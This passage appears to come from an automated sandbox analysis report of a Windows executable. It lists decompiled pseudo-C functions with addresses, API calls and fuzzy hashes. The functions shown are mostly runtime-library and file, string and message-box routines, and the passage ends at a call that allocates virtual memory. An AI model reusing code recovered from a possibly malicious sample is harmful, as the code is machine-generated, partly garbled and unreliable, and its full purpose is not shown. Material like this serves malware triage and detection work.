						_t9 = ReadFile(_t16,  &_v260, _t7,  &_a4, 0);
						_push(_t16);
						if(_t9 == 0) {
							L4:
							_t6 = CloseHandle();
							goto L1;
						} else {
							CloseHandle();
							return E004013EE( &_a4,  &_v260, _a4);
						}
					}
					_push(_t16);
					goto L4;
				}
				L1:
				return _t6 | 0xffffffff;
			}








                                                    0x00401462
                                                    0x00401468
                                                    0x0040146d
                                                    0x00401477
                                                    0x00401480
                                                    0x00401492
                                                    0x00401494
                                                    0x00401494
                                                    0x004014a5
                                                    0x004014ab
                                                    0x004014ae
                                                    0x00401483
                                                    0x00401483
                                                    0x00000000
                                                    0x004014b0
                                                    0x004014b0
                                                    0x00000000
                                                    0x004014c0
                                                    0x004014ae
                                                    0x00401482
                                                    0x00000000
                                                    0x00401482
                                                    0x0040146f
                                                    0x00000000

                                                    APIs
                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401462
                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00401477
                                                    • CloseHandle.KERNEL32(00000000), ref: 00401483
                                                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004014A5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004014B0
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: File$CloseHandle$CreateReadSize
                                                    • String ID:
                                                    • API String ID: 3664964396-0
                                                    • Opcode ID: 013e0af82d7a6b2e5f35bbcea206836571af9d8b7aa570e87a9070e4b7d5abd5
                                                    • Instruction ID: d641886a9950a0c82a4b875262907e0bd9fc75687d8ef0e148272af4640e0b6f
                                                    • Opcode Fuzzy Hash: 013e0af82d7a6b2e5f35bbcea206836571af9d8b7aa570e87a9070e4b7d5abd5
                                                    • Instruction Fuzzy Hash: C801F731500120BBEB205731DC49FEA3A1CAB04720F104731FA65F50F0D6B4994187AD
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407D1B Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00407D1B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x410280);
				E00405290(__ebx, __edi, __esi);
				_t28 = E004066FD(__ebx, __edx, _t31);
				_t12 =  *0x412d18; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E004083A8(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E00407CCE(_t29,  *0x412f60);
					 *(_t30 - 4) = 0xfffffffe;
					E00407D88();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E004066FD(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E004037A2(_t25, _t34);
				}
				return E004052D5(_t29);
			}








                                                    0x00407d1b
                                                    0x00407d1b
                                                    0x00407d1b
                                                    0x00407d1b
                                                    0x00407d1b
                                                    0x00407d1d
                                                    0x00407d22
                                                    0x00407d2c
                                                    0x00407d2e
                                                    0x00407d36
                                                    0x00407d5a
                                                    0x00407d5c
                                                    0x00407d62
                                                    0x00407d6c
                                                    0x00407d77
                                                    0x00407d7a
                                                    0x00407d81
                                                    0x00407d38
                                                    0x00407d38
                                                    0x00407d3c
                                                    0x00000000
                                                    0x00407d3e
                                                    0x00407d43
                                                    0x00407d43
                                                    0x00407d3c
                                                    0x00407d46
                                                    0x00407d48
                                                    0x00407d4a
                                                    0x00407d4c
                                                    0x00407d51
                                                    0x00407d59

                                                    APIs
                                                    • __getptd.LIBCMT ref: 00407D27
                                                      • Part of subcall function 004066FD: __getptd_noexit.LIBCMT ref: 00406700
                                                      • Part of subcall function 004066FD: __amsg_exit.LIBCMT ref: 0040670D
                                                    • __getptd.LIBCMT ref: 00407D3E
                                                    • __amsg_exit.LIBCMT ref: 00407D4C
                                                    • __lock.LIBCMT ref: 00407D5C
                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00407D70
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                    • String ID:
                                                    • API String ID: 938513278-0
                                                    • Opcode ID: fb1f80cfc81544fa29a0bd8c9204db66d9becd3e909c589855755f55235838a0
                                                    • Instruction ID: 0b16a431041f0aff214b42f3b60f46fac49f37ddf6db757e4a827498dcc548b0
                                                    • Opcode Fuzzy Hash: fb1f80cfc81544fa29a0bd8c9204db66d9becd3e909c589855755f55235838a0
                                                    • Instruction Fuzzy Hash: 2FF09631D487109BD721BB699807B5E37A0AF40724F21827FF401B72D2CB7C6940AA5E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004032F3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004032F3() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x416400;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x416400 = _t5;
				}
				_t6 = E00407E13(_t5, 4);
				 *0x4153fc = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x4123f8;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x412678) {
							break;
						}
						_t6 =  *0x4153fc;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x412408;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x4152e0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x412468);
					return 0;
				} else {
					 *0x416400 = _t26;
					_t6 = E00407E13(_t26, 4);
					 *0x4153fc = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}













                                                    0x004032f3
                                                    0x004032fb
                                                    0x004032fe
                                                    0x00403309
                                                    0x0040330b
                                                    0x00000000
                                                    0x0040330b
                                                    0x00403300
                                                    0x00403300
                                                    0x0040330d
                                                    0x0040330d
                                                    0x0040330d
                                                    0x00403315
                                                    0x0040331c
                                                    0x00403323
                                                    0x00403343
                                                    0x00403343
                                                    0x00403345
                                                    0x00403351
                                                    0x00403351
                                                    0x00403354
                                                    0x00403357
                                                    0x00403360
                                                    0x00000000
                                                    0x00000000
                                                    0x0040334c
                                                    0x0040334c
                                                    0x00403364
                                                    0x00403365
                                                    0x00403367
                                                    0x0040336d
                                                    0x00403381
                                                    0x00403387
                                                    0x00403391
                                                    0x00403391
                                                    0x00403393
                                                    0x00403396
                                                    0x00403397
                                                    0x004033a3
                                                    0x00403325
                                                    0x00403328
                                                    0x0040332e
                                                    0x00403335
                                                    0x0040333c
                                                    0x00000000
                                                    0x0040333e
                                                    0x00403340
                                                    0x00403342
                                                    0x00403342
                                                    0x0040333c

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __calloc_crt
                                                    • String ID: h$A$x&A
                                                    • API String ID: 3494438863-1798051974
                                                    • Opcode ID: 02ecb9f5c3374d0561a5a54448d8635793c7f3760488bf19b4da9999a349a326
                                                    • Instruction ID: f0b5fdebd6ddfda0aa0d629ff2a5580ec17d7548dfea1e9e619b7408842a9ec5
                                                    • Opcode Fuzzy Hash: 02ecb9f5c3374d0561a5a54448d8635793c7f3760488bf19b4da9999a349a326
                                                    • Instruction Fuzzy Hash: 4811E73170461187E7144F1EFC806E62B89E784B29714813BE921E73D0EB7CDE82464D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00401E07 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00401E07() {
				short _v516;
				void* __esi;
				void* __ebp;
				WCHAR* _t11;
				void* _t14;
				void* _t16;
				int _t19;

				_t19 = GetWindowTextLengthW( *0x4140ec);
				if(SendMessageW( *0x4140ec, 0xb8, 0, 0) == 0 || _t19 == 0 &&  *0x414570 == 0) {
					L10:
					E004015BC(0x40e2ec, 0);
					E00401066();
					return 1;
				} else {
					LoadStringW( *0x4140e0, 0x174,  &_v516, 0);
					_t11 = 0x414570;
					if( *0x414570 == 0) {
						_t11 =  &_v516;
					}
					_t14 = E004010E8(0, 0x17a, _t11, 0x23);
					if(_t14 == 0) {
						L8:
						return 0;
					} else {
						_t16 = _t14 - 4;
						if(_t16 == 0) {
							return E00401DD8(0);
						}
						if(_t16 == 1) {
							goto L10;
						}
						goto L8;
					}
				}
			}










                                                    0x00401e2d
                                                    0x00401e37
                                                    0x00401e98
                                                    0x00401e9e
                                                    0x00401ea3
                                                    0x00000000
                                                    0x00401e46
                                                    0x00401e59
                                                    0x00401e5f
                                                    0x00401e6b
                                                    0x00401e6d
                                                    0x00401e6d
                                                    0x00401e82
                                                    0x00401e83
                                                    0x00401e8d
                                                    0x00000000
                                                    0x00401e85
                                                    0x00401e85
                                                    0x00401e88
                                                    0x00000000
                                                    0x00401e91
                                                    0x00401e8b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00401e8b
                                                    0x00401e83

                                                    APIs
                                                    • GetWindowTextLengthW.USER32 ref: 00401E18
                                                    • SendMessageW.USER32(000000B8,00000000,00000000), ref: 00401E2F
                                                    • LoadStringW.USER32(00000174,?,00000000), ref: 00401E59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: LengthLoadMessageSendStringTextWindow
                                                    • String ID: pEA
                                                    • API String ID: 4234871374-660962052
                                                    • Opcode ID: 071a6ab8e590410c588140024cc1bcc6722993a76eb6752d5ed8463caba97c67
                                                    • Instruction ID: a49478dfc268f36e9dd2a680d3ee593884c10817f6424ce10583db55756e666f
                                                    • Opcode Fuzzy Hash: 071a6ab8e590410c588140024cc1bcc6722993a76eb6752d5ed8463caba97c67
                                                    • Instruction Fuzzy Hash: 45018C76600224A6EB316772EC49EAB3A6CEB85791F408537B906F11F1DB38895085ED
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004034D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E004034D5(intOrPtr _a4) {
				struct HINSTANCE__* _t2;

				_t2 = GetModuleHandleW(L"mscoree.dll");
				if(_t2 != 0) {
					_t2 = GetProcAddress(_t2, "CorExitProcess");
					if(_t2 != 0) {
						return _t2->i(_a4);
					}
				}
				return _t2;
			}




                                                    0x004034df
                                                    0x004034e7
                                                    0x004034ef
                                                    0x004034f7
                                                    0x00000000
                                                    0x004034fc
                                                    0x004034f7
                                                    0x004034ff

                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(mscoree.dll,?,0040350D,?,?,0040AD6C,000000FF,0000001E,00000001,00000000,00000000,?,00407DDF,?,00000001,?), ref: 004034DF
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004034EF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 1646373207-1276376045
                                                    • Opcode ID: 87c01434c75e47e1ba7ae4fc4c758284c2ba824ddb634b3228af7bc3b8fd1a6f
                                                    • Instruction ID: 11d349c6c78c17fbda669c988c9991420dfb55432b43ad31d4b5174e40712a2e
                                                    • Opcode Fuzzy Hash: 87c01434c75e47e1ba7ae4fc4c758284c2ba824ddb634b3228af7bc3b8fd1a6f
                                                    • Instruction Fuzzy Hash: 75D0C7302402097BDA111FA39D0AE163E5D99447523184835B818F55E1DE75E570956D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407F3B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00407F3B(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E004030D9( &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0040806B( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00403090(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x50036ad0
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x50036ad0
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x50036ad0
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                                    0x00407f45
                                                    0x00407f4c
                                                    0x00407f63
                                                    0x00000000
                                                    0x00407f53
                                                    0x00407f55
                                                    0x00407f6f
                                                    0x00407f74
                                                    0x00407f77
                                                    0x00407f7a
                                                    0x00407fa2
                                                    0x00407fa9
                                                    0x00407fab
                                                    0x0040802c
                                                    0x0040803e
                                                    0x00408047
                                                    0x00408049
                                                    0x00407f89
                                                    0x00407f89
                                                    0x00407f8c
                                                    0x00407f8e
                                                    0x00407f91
                                                    0x00407f91
                                                    0x00407f91
                                                    0x00407f91
                                                    0x00000000
                                                    0x00407f97
                                                    0x0040800b
                                                    0x0040800b
                                                    0x00408010
                                                    0x00408016
                                                    0x00408019
                                                    0x0040801b
                                                    0x0040801e
                                                    0x0040801e
                                                    0x0040801e
                                                    0x0040801e
                                                    0x00000000
                                                    0x00408022
                                                    0x00407fad
                                                    0x00407fb0
                                                    0x00407fb0
                                                    0x00407fb6
                                                    0x00407fb9
                                                    0x00407fe0
                                                    0x00407fe3
                                                    0x00407fe3
                                                    0x00407fe9
                                                    0x00000000
                                                    0x00000000
                                                    0x00407feb
                                                    0x00407fee
                                                    0x00000000
                                                    0x00000000
                                                    0x00407ff0
                                                    0x00407ff0
                                                    0x00407ff0
                                                    0x00407ff6
                                                    0x00407ff9
                                                    0x00407f68
                                                    0x00407f68
                                                    0x00408002
                                                    0x00000000
                                                    0x00408002
                                                    0x00407fbb
                                                    0x00407fbe
                                                    0x00000000
                                                    0x00000000
                                                    0x00407fc2
                                                    0x00407fd0
                                                    0x00407fd3
                                                    0x00407fd9
                                                    0x00407fdb
                                                    0x00407fde
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407fde
                                                    0x00407f7c
                                                    0x00407f7f
                                                    0x00407f81
                                                    0x00407f86
                                                    0x00407f86
                                                    0x00000000
                                                    0x00407f57
                                                    0x00407f57
                                                    0x00407f5c
                                                    0x00407f60
                                                    0x00407f60
                                                    0x00000000
                                                    0x00407f5c
                                                    0x00407f55

                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00407F6F
                                                    • __isleadbyte_l.LIBCMT ref: 00407FA2
                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,00409D33,00000109,00BFBBEF,00000003), ref: 00407FD3
                                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00409D33,00000109,00BFBBEF,00000003), ref: 00408041
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: bea31f64e229497cbceeed98385b7dbf45dda057ab5ed2bdd644a603ce3fa4ba
                                                    • Instruction ID: 02799ae459e54357e4b115582d640f5e7eb52f4b4511244756d7fcc0631b5aaa
                                                    • Opcode Fuzzy Hash: bea31f64e229497cbceeed98385b7dbf45dda057ab5ed2bdd644a603ce3fa4ba
                                                    • Instruction Fuzzy Hash: E331BD31A04246EFCB20CF74C8909BA7BA5AF01311F15857EF461AB2D1DB34ED51DB5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040492E Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0040492E(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00404220(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00404307(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00404841(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00404780(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                    0x00404933
                                                    0x00404939
                                                    0x004049ac
                                                    0x00000000
                                                    0x00404940
                                                    0x00404940
                                                    0x00404943
                                                    0x0040495e
                                                    0x00404961
                                                    0x00404981
                                                    0x00404993
                                                    0x00404963
                                                    0x00404963
                                                    0x00404966
                                                    0x00000000
                                                    0x00404968
                                                    0x0040497a
                                                    0x0040497a
                                                    0x00404966
                                                    0x004049b1
                                                    0x004049b5
                                                    0x00404945
                                                    0x0040495d
                                                    0x0040495d
                                                    0x00404943

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                    • Instruction ID: d5a7c7c6a8e08316eca14c6111e7fc475960795e5449b79a03fc0675aa93ec86
                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                    • Instruction Fuzzy Hash: 7B1175B200404ABBCF125E95DC418EE3F66BB88354B54842AFF1865571C33AC972AB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004010E8 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 33%
                                                    			E004010E8(struct HWND__* _a4, int _a8, intOrPtr _a12, signed int _a16) {
				short _v516;
				short _v1028;
				struct HWND__* _t21;

				LoadStringW( *0x4140e0, _a8,  &_v516, 0);
				wnsprintfW( &_v1028, 0,  &_v516, _a12);
				_push(0);
				_push( &_v516);
				if((_a16 & 0x000000f0) != 0x30) {
					_push(0x170);
				} else {
					_push(0x171);
				}
				LoadStringW( *0x4140e0, ??, ??, ??);
				_t21 = _a4;
				if(_t21 == 0) {
					_t21 =  *0x4140e4;
				}
				return MessageBoxW(_t21,  &_v1028,  &_v516, _a16);
			}






                                                    0x0040110a
                                                    0x0040111f
                                                    0x00401132
                                                    0x0040113a
                                                    0x0040113b
                                                    0x00401144
                                                    0x0040113d
                                                    0x0040113d
                                                    0x0040113d
                                                    0x0040114f
                                                    0x00401151
                                                    0x00401157
                                                    0x00401159
                                                    0x00401159
                                                    0x00401177

                                                    APIs
                                                    • LoadStringW.USER32(?,?,00000000), ref: 0040110A
                                                    • wnsprintfW.SHLWAPI ref: 0040111F
                                                    • LoadStringW.USER32(00000170,?,00000000), ref: 0040114F
                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00401170
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: LoadString$Messagewnsprintf
                                                    • String ID:
                                                    • API String ID: 1831994018-0
                                                    • Opcode ID: ceef9881aa906b9763840ddf78165da5d5206d2564b01361ddb618e0a148d864
                                                    • Instruction ID: a7b236bf54faea74e29bf95ac267da5978dc9c7f0cb060403fecbf38d59700a4
                                                    • Opcode Fuzzy Hash: ceef9881aa906b9763840ddf78165da5d5206d2564b01361ddb618e0a148d864
                                                    • Instruction Fuzzy Hash: 4D019E7A61021DABEF10CF54DC45FEA7B7CBB08304F0440A6B715B61A1D270AA218F98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403011 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • DecodePointer.KERNEL32(?,0040304A,00000000,00000000,00000000,00000000,00000000,00403D2B,?,00405F5E,00000003,0040AD5B,00000001,00000000,00000000), ref: 0040301C
                                                    • __invoke_watson.LIBCMT ref: 00403038
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.302708322.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.302694562.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302784618.000000000040E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                    • Associated: 00000001.00000002.302795509.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: DecodePointer__invoke_watson
                                                    • String ID: H@
                                                    • API String ID: 4034010525-3372785075
                                                    • Opcode ID: 5a75fda1e63beea94b6b6044320001e5b5095c26056203cf89e6bba064247494
                                                    • Instruction ID: 0fab57b667603aa181da266b20968551caabab4847ae603e9b130466e6e374f5
                                                    • Opcode Fuzzy Hash: 5a75fda1e63beea94b6b6044320001e5b5095c26056203cf89e6bba064247494
                                                    • Instruction Fuzzy Hash: 32E0EC72000109BBDF062F62DD098AA3F6AEB44351B444435FE1495171D736CD71EBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Executed Functions

                                                    Function 0041E7CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                                    C-Code - Quality: 100%
